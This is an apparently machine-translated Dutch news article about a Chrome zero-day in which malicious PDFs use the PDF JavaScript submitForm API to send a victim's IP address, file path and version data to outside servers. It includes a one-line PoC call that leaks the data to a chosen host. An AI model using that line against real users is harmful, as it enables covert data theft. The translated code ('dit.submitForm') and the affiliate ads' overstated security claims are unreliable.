Chrome-bug laat hackers gebruikersgegevens verzamelen via pdf-bestanden

  • EdgeSpot ontdekte een intrigerende zero-day kwetsbaarheid die gebruikmaakt van PDF-documenten in Chrome.
  • Dit kwetsbaarheid kan u schaden door de gevoelige gegevens op uw pc te verzamelen.
  • Ontdek onze Web & Cloud-pagina voor meer inzichten over andere tools en services.
  • Als u geïnteresseerd bent in browsers, bieden we veel informatie hierover in onze Browsershub.
Chrome-bug laat hackers gebruikersgegevens verzamelen uit uw PDF-bestanden
Hoe zit het met het gebruik van de beste documentmanager?
Maak al uw documenten toegankelijk en veilig met Adobe Acrobat Reader. Met deze tool voor documentbeheer kunt u ook e-ondertekenen en officiële formulieren maken om tijd op het werk te besparen. Download het voor uw pc en u zult in staat zijn om:
  • Open, print en bewerk al uw PDF's en andere bestandstypen
  • Eenvoudiger PDF-formulieren invullen
  • Houd uw essentiële documenten versleuteld

Krijg alle apps voor een speciale prijs!

'S Werelds Nr.1 ​​documentbeheersoftware is nu voor een geweldige prijs, dus schiet op!

Exploitdetectieservice EdgeSpot ontdekte een intrigerende Chroom zero-day kwetsbaarheid die PDF-documenten exploiteert.

Door de kwetsbaarheid kunnen aanvallers: gevoelige gegevens oogsten met behulp van schadelijke PDF-documenten die zijn geopend in Chrome.

Zodra het slachtoffer de respectievelijke pdf-bestanden in Google Chrome opent, begint een kwaadaardig programma op de achtergrond te werken door gebruikersgegevens te verzamelen.

De gegevens worden vervolgens doorgestuurd naar de externe server die wordt beheerd door de hackers. U vraagt ​​zich misschien af ​​welke gegevens door de aanvallers worden opgezogen, ze richten zich op de volgende gegevens op uw pc:

  • IP adres
  • Volledig pad van het PDF-bestand op het systeem
  • OS- en Chrome-versies

Pas op voor door malware geteisterde PDF-bestanden

Experts gespot dat een van de twee domeinen leesnotify[.]com of burpcollaborator[.]net de gegevens ontving.

Ze onthulden dat de aanvallers de dit.submitForm() PDF Javascript API om de gevoelige informatie van de gebruikers te verzamelen.

We hebben het getest met een minimale PoC, een eenvoudige API-aanroep zoals dit.submitForm(‘ http://google.com/test’) zorgt ervoor dat Google Chrome de persoonlijke gegevens naar google.com stuurt.

Deze Chrome-bug werd uitgebuit door twee verschillende sets kwaadaardige PDF-bestanden, die beide respectievelijk in oktober 2017 en september 2018 in omloop waren.

Met name kunnen de verzamelde gegevens door de aanvallers worden gebruikt om aanvallen in de toekomst te verfijnen. Rapporten suggereren dat de eerste batch bestanden is samengesteld met behulp van de PDF-trackingservice van ReadNotify.

Gebruikers kunnen de service gebruiken om gebruikersweergaven bij te houden. EdgeSpot heeft geen details gedeeld over de aard van de tweede set PDF-bestanden.

Snelle tip: verander je browser naar Opera

In deze moeilijke tijden worden we bij elke stap aangevallen met malware, phishing en trojans, dus we moeten veel waakzamer zijn en beschermd blijven.

En aangezien dit een specifiek probleem is voor Chrome, kunt u die dreiging en alle andere vermijden met een op beveiliging gerichte browser zoals Opera.

Deze browser wordt geleverd met een ingebouwde adblocker die niet alleen dergelijke afleidingen opruimt, maar ook blokkeert analysescripts, trackingpixels en methoden om uw gegevens te verzamelen.

En als je er absoluut zeker van wilt zijn dat je uit de buurt blijft van elk gevaar, ga dan achter de ingebouwde VPN service die 100% gratis te gebruiken is voor onbeperkte tijd.

Opera

Opera

Opera biedt de perfecte bescherming tegen bedreigingen met de ingebouwde gratis adblocker en VPN-service!

Krijg het gratis
Bezoek website

Hoe kan ik beschermd blijven tegen PDF-kwetsbaarheden?

Adobe Acrobat PRO downloaden

Adobe Acrobat PRO

Adobe en Chrome passen goed bij elkaar als het gaat om het verwerken van PDF-bestanden. Door de Adobe-extensie voor Chrome te installeren, kunt u PDF's naar wens bekijken en manipuleren zonder uw favoriete browser te verlaten.

Ondanks zijn robuuste structuur, wordt malware die verborgen is in PDF-bestanden mogelijk niet gedetecteerd als u de standaardversie van de Reader gebruikt.

De professionele versie wordt aanbevolen om uw bescherming te garanderen en uw gegevens uit de buurt van hackers te houden.

Hoewel het niet gratis is, is de prijs die u betaalt nogal klein voor de overvloed aan extra functies waarvan u zult genieten, waaronder de verbeterde beveiliging van uw PDF-bestanden.

Er is ook een gratis proefperiode van 7 dagen inbegrepen, zodat u kunt proeven van de volledige Pro-ervaring voordat u de aankoop doet.

Adobe Acrobat PRO

Adobe Acrobat PRO

Blijf uit de buurt van malware door Adobe Acrobat PRO te downloaden. Het heeft veel meer functies dan de gratis versie en houdt uw gegevens veilig.

Gratis proefversie
Bezoek website

Als u veilig wilt zijn tijdens het surfen op het internet, heeft u een volledig toegewijde tool nodig om uw netwerk te beveiligen. Installeer nu privé-internettoegang en beveilig jezelf. Het beschermt uw pc tegen aanvallen tijdens het browsen, maskeert uw IP-adres en blokkeert alle ongewenste toegang.


Exploitdetectieservice EdgeSpot wilde de Chrome-gebruikers wijzen op de mogelijke risico's omdat de patch naar verwachting niet in de nabije toekomst zou worden uitgebracht.

EdgeSpot meldde vorig jaar bij Google over de kwetsbaarheid en het bedrijf beloofde eind april een patch uit te brengen.

U kunt echter overwegen een tijdelijke oplossing voor het probleem te gebruiken door de ontvangen PDF-documenten lokaal te bekijken met een andere reader-app.

Als alternatief kunt u uw PDF-documenten ook openen in Chrome door uw systemen los te koppelen van internet.

Veel Gestelde Vragen

  • Ja dat doet het. Maar als u een bredere selectie wilt, ontdek onze topkeuzes voor Chroomprivacy extensies in deze complete gids.

  • Thier zijn veel extensies die dit toestaan PDF's verwerken. Controleren uit onze uitstekende gids over de beste PDF-extensies voor Chrome.

  • Dat doet het niet, maar je kunt het snel activeren. Hier is onze uitgebreide gids over het inschakelen van de QR-codegenerator in Chrome.

Is de Puffin-browser veilig? Dit is wat je moet weten

Is de Puffin-browser veilig? Dit is wat je moet wetenCyberbeveiliging

Het kiezen van de juiste browser is geen eenvoudige taak, en veel gebruikers hebben van Puffin hun favoriete browser gemaakt.Puffin biedt solide functies, maar veel gebruikers vragen zich af of de ...

Lees verder
Microsoft streeft ernaar updates voor Huawei-laptops aan te bieden

Microsoft streeft ernaar updates voor Huawei-laptops aan te biedenHuaweiMicrosoftCyberbeveiliging

Microsoft en Intel beloofden dat ze beveiligings- en driverupdates voor bestaande Huawei-producten zouden blijven uitbrengen.Dit nieuws komt als een verademing na het besluit van het Amerikaanse mi...

Lees verder
Windows 10 Anniversay Update biedt TPM 2.0-ondersteuning voor alle Windows 10-apparaten

Windows 10 Anniversay Update biedt TPM 2.0-ondersteuning voor alle Windows 10-apparatenWindows 10Cyberbeveiliging

Beveiliging is altijd een prioriteit geweest voor Microsoft, met resultaten die zo bevredigend zijn dat President Obama zelf heeft een Microsoft-medewerker gekozen voor zijn cyberbeveiligingsteam. ...

Lees verder